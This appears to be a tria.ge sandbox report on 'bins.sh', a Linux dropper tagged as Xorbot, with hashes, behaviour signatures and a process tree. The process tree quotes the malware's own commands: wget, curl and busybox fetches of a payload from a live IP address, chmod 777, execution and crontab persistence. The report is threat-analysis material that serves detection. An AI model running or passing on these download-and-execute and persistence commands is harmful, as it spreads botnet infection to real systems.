Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
05/01/2025, 02:07
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
14d81ef351bb6aae82ee36299ec51f37
-
SHA1
58f421dee90f5cf84f804bc5fdd25e6c772bd694
-
SHA256
a951ff81fba393bc4198415409f8debbd1810cd12428e09d4911db31b2c13865
-
SHA512
fd5442120434dd9da842e3d123263711ed0c0052b53d66f04c5c4b9e966208181ea139e2efdd758237a1a4500f08bad61cc6319ccd96314b97a940f4bc318c40
-
SSDEEP
192:Fnbdk8L13hLVWSX3Lvemcu6JdL13hLVWSLTemcu6JWXO:xdko3LYG
Malware Config
Signatures
-
resource yara_rule behavioral1/files/fstream-1.dat family_xorbot -
Xorbot family
-
Contacts a large (2292) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1500 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE 1501 LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE -
Renames itself 1 IoCs
pid Process 1502 LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.MkPQ4d crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for reading /proc/425/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1164/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1284/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1524/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1528/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/18/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/25/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/34/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1546/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1615/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1653/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/404/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/658/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1561/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1526/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1575/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1582/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1657/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1660/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/84/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/630/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1275/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1534/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1535/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1643/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/36/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/165/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1318/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1661/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/30/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1531/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1647/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/474/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/568/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1538/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1552/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/17/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/23/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/168/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/170/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/318/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/597/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1536/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1539/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1545/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1558/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1563/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/924/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1174/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1463/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1588/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1654/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1574/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1629/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1634/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1651/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/2/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1166/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1515/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1595/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1648/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/952/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1556/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1592/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE wget File opened for modification /tmp/LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE curl File opened for modification /tmp/LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:1492
-
/bin/rm/bin/rm bins.sh2⤵PID:1493
-
-
/usr/bin/wgetwget http://66.63.187.225/bins/LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE2⤵
- Writes file to tmp directory
PID:1494
-
-
/usr/bin/curlcurl -O http://66.63.187.225/bins/LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE2⤵
- Writes file to tmp directory
PID:1498
-
-
/bin/busybox/bin/busybox wget http://66.63.187.225/bins/LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE2⤵
- Writes file to tmp directory
PID:1499
-
-
/bin/chmodchmod 777 LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE2⤵
- File and Directory Permissions Modification
PID:1500
-
-
/tmp/LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE./LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:1501 -
/bin/shsh -c "crontab -l"3⤵PID:1503
-
/usr/bin/crontabcrontab -l4⤵PID:1504
-
-
-
/bin/shsh -c "crontab -"3⤵PID:1505
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1506
-
-
-
-
/bin/rmrm LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE2⤵PID:1508
-
-
/usr/bin/wgetwget http://66.63.187.225/bins/aufK8cCuLXUgGcF5gRWjQmCKH0sKidBFiY2⤵PID:1511
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
210B
MD57b8fce9ed00346045684a2469ff17d81
SHA1cfca0b8a149546bd080ca783fe1fb5d706703b19
SHA2567bccccb2a9696903de6c097785c46c9bb2d860163df1a51a399e45686856e72d
SHA512012c56e2be7da4fdf6fdb496af597b23bb5cf1c93be98a886c854d5961853876b887dddaf64a7eee9cf66b8e36a3ac2e9c43f21e772f95166d659d6607c0721a